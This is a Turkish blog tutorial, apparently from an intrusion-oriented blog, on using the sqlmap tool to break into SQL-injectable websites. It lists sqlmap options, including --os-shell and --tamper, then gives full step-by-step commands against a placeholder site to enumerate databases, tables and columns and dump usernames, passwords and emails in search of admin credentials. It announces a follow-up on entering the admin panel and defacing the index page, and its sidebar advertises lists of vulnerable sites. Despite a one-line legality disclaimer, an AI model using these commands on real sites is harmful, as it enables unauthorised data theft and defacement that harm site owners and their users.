HIZLI ANLATIM SQLMAP TOOLU KULLANIMI

 


HERKESE MERHABA BRN PİKARUN.

Bu bölümde SQLMAP ile nasıl SQL açıklı bir sitenin databesine sizabiliriz onu öğreteceğim.

Şunu belirtmek isterim ki SQLMAP toolu oldukça geniş bir konu o yüzden bu bölümde en çok kullanılan parametreler  hakkında konuşacağız.

Bu toolda ilerlemek isterseniz eğer bölüm sonunda vereceğim siteye mutlaka iyice bakıp gerekli notları çıkarın.


SQLMAP PARAMETRELERİ:


SQLMap, oldukça kapsamlı bir araç olduğundan bir dizi parametre ve seçenek sunar. İşte SQLMap'in yaygın olarak kullanılan bazı önemli parametreleri ve ne işe yaradıkları:


1. `-u` veya `--url`: Hedef web sitesinin URL'sini belirtir. Bu parametre ile SQL enjeksiyonu saldırısını gerçekleştirmek istediğiniz web sitesini belirtirsiniz.


2. `-p` veya `--param`: SQL enjeksiyonunun hedefleneceği parametreyi belirtir. Örneğin, `-p id` parametresi "id" adlı parametrenin enjekte edileceğini belirtir.


3. `--data`: POST isteği gönderirken kullanılacak verileri belirtir. Özellikle POST tabanlı SQL enjeksiyonlarında kullanışlıdır.


4. `--cookie`: Tarayıcı oturum bilgilerini temsil eden çerez değerlerini belirtir.


5. `--dbms`: Hedef veritabanı yönetim sistemi türünü belirtir. Örneğin, `--dbms=mysql` MySQL veritabanı sistemini hedeflediğinizi belirtir.


6. `--level`: Saldırı seviyesini belirtir. Daha yüksek seviyelerde daha fazla test yapılır, ancak daha fazla istek gönderilebilir.


7. `--risk`: Saldırı risk seviyesini belirtir. Daha yüksek risk seviyeleri daha fazla test yapar.


8. `--threads`: Eşzamanlı isteklerin sayısını belirtir. Performansı artırmak için kullanılır.


9. `--tamper`: Enjeksiyon sorgularını özelleştirmek için kullanılır. Örneğin, `--tamper=space2comment` boşlukları SQL yorumlarına dönüştürmek için kullanılır.


10. `--dbs`: Hedef sistemdeki mevcut veritabanlarını listeleyerek veritabanı adlarını alır.


11. `--tables`: Belirli bir veritabanındaki tabloları listeler.


12. `--columns`: Bir tablodaki sütunları listeler.


13. `--dump`: Veritabanı bilgilerini çalmak için kullanılır. Örneğin, `--dump -D dbname -T tablename` belirli bir tablodan verileri çalacaktır.


14. `--os-shell`: Sistemde komut istemi almak için kullanılır.


15. `--batch`: Tüm soruları otomatik olarak cevaplamak ve etkileşimi azaltmak için kullanılır.

16. '--random-agent' : Size farklı bir kimlik vererek sitenin datasına istek atmanızı sağlar

17.'--batch : parametresi ile SQLMap, aşağıdaki gibi bazı sorguları ve durumları otomatik olarak ele alır


Bu sadece SQLMap'in bazı temel parametrelerini kapsamaktadır. SQLMap'in belirli durumlarda kullanılabilecek daha birçok parametresi ve seçeneği bulunmaktadır. SQLMap'ı kullanırken dikkatli olun, yalnızca kendi sistemleriniz veya izin verilen sistemler üzerinde kullanın ve yasal sınırlamalara uyun.

Şimdi ben size bir örnek ile açıklayacağım SQLMAP kullanımını.
SENARYO1:
Diyelim elimizde http://orneksite.co.uk/trainers.php?id=4 Site bu diyelim. 
NOT: Site kesinlikle bir sitenin url'i değildir.
ADIM-1:
önce teminal kısmına : 
 python2 sqlmap.py -u http://orneksite.co.uk/trainers.php?id=4 --random-agent --batch --dbs
(Burda --random-agentile farklı bir işletim sistemi adına istek gönderdik.Sonra --batch parametresi ile Gelen yanıtları otomatikleştirmesini sağladık.En sondaki --dbs parametresi ile de sitenin databesine erişmek istediğimizi belirttik.)
ADIM-2:
Bundan sonra diyelim sitenin datasını tool buldu.İki tane datası olsun diyelim
ornekdata
information_schema
information_schema kısmı genelde site hakkında genel bilgileri verdiği için biz ornekdata kısmı ile ilgileneceğiz.Terminale Gelip 
python2 sqlmap.py -u http://orneksite.co.uk/trainers.php?id=4 --random-agent --batch -D ornekdata --tables
(Burada -D komutu ile hangi datadan işlem yapmamız gerektiğini belirttik ve --tables parametresi ile de ornekdata databesindeki tabloları çekip bizim önümüze getirmesini istedik.) 
ADIM-3:
Şimdi tabloları çekti ve sitenin tabloları şu şekilde:
users
catalog
photo
chat
help_chat
Şimdi admin bilgilerinin olduğu tablo genelde users,admin,members gibi tablolarda olur.Doğru tabloyu bulmak için deneme yanılma yolu ile gerekli tablolara girin.

python2 sqlmap.py -u http://orneksite.co.uk/trainers.php?id=4 --random-agent --batch -D ornekdata -T users --columns
(Burda -T ile hangi tablo ile işlem yapacağımızı belirttik ve --columns ile de o tablodaki verileri çekmek istediğimizi belirttik.)
ADIM-4:
Şimdi ise önümüze diyelim 
user
passwd
mail
id
gibisinden şeyler çıkardı.Bundan sonra ise terminal kısmına:
python2 sqlmap.py -u http://orneksite.co.uk/trainers.php?id=4 --random-agent --batch -D ornekdata -T users -C user,passwd,mail --dump
yazıyoruz.
(Burda ise -C komutu ile hangi verileri dump edeceğimizi yani hangi verileri çekmek istediğimizi belirttik.Çekmek istediğimiz veriler arasında virgül koymayı unutmayın.)

Genel olarak toplamak gerekirse:
Önce sitemizi toolda belirtip bu sitenin databesine erişmek istediğimizi gerekli komutlar yardımıyla belirttik.
Sonra çekilen databesten admin bilgileri olan siteyi belirtip o sitenin Tsablolarını çektik.
Daha sonra ise Çektiğimiz tablodaki admin bilgilerinin bulunabileceği yerin sütunlarını çektik.
En son ise o sütundaki admin bilgilerini dump ettik.
Şunu belirtmek isterim ki bu site tamamen örnektir.Bud demek oluyor ki her sitede aynı databesi yada aynı tabloları göreceğiniz anlamına geliyor.

Bu bölümde temel olarak bir SQL açıklı bir siteye nasıl sızabilirsiniz onu gösterdim.Bölüm başında da belirttiğim gibi SQLMAP derya deniz o yüzden bu toolda daha profesyonel hale gelmek isterseniz eğer aşağıda vereceğim sitelere kesinlikle detaylıca bakmanızı öneririm.

1-https://www.netsparker.com.tr/blog/web-guvenligi/ileri-seviye-sqlmap-kullanimi/
2-https://www.siberguvenlikblogu.com/2021/06/ileri-duzey-sqlmap-kullanimi.html

Bu bölümde dilim döndüğü sürece size SQLMAP Toolunu anlattıım.Dİğer bölümde aldığımız bilgier ile admin panele sızıp ordaki indexi  değiştirmek olacak.

Yorumlar

Bu blogdaki popüler yayınlar

FREE SORGU PANELİ☢️

SQL AÇIKLI SİTELER

ÜCRETSİZ SMM PANEL KURMA